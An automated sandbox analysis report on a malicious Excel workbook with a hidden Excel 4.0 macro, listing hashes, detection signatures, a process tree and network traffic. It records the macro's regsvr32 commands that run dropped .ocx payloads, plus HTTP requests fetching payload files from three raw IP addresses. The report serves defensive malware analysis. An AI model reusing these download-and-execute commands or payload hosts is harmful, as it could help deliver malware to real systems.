Windows Analysis Report ClaimCopy-1848214335-12022021.xlsb

Overview

General Information

Sample Name: ClaimCopy-1848214335-12022021.xlsb
Analysis ID: 532757
MD5: 08dbf91f6a89fdb8dcd18dfe657147f3
SHA1: 990b5abe4b156c201174e412aca4b3dcb372070c
SHA256: 29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
Potential document exploit detected (performs HTTP gets)

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5116 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5784 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4000 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5216 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3412 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3108 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5344 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5116, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 5784

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: ClaimCopy-1848214335-12022021.xlsb, Virustotal: Detection: 8%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
    Source: global traffic, TCP traffic: 192.168.2.3:49746 -> 185.82.126.78:80
    Source: global traffic, HTTP traffic detected: GET /337591964609.dat HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.82.126.78 | Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET /337591964609.dat HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 158.69.133.78 | Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET /337591964609.dat HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 45.142.211.62 | Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 45.142.211.62 | Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.82.126.78 | Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 158.69.133.78 | Connection: Keep-Alive
    Source: unknown, TCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknown, TCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknown, TCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 02 Dec 2021 16:29:13 GMT | Content-Type: text/html | Content-Length: 548 | Connection: keep-alive
    Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 02 Dec 2021 16:29:17 GMT | Content-Type: text/html | Content-Length: 548 | Connection: keep-alive
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryK
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com7
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.cortana.ai
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comom
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net?J
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netGK$;a
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netvI5=
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comcentG
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsN
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://augloop.office.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2e
    Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml)
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.entity.
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab4
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/5
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/f
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies%
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosE.r8%
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey2
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyl
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx0
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Officei
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com1
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cortana.ai
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cr.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.comZ7
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comt
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
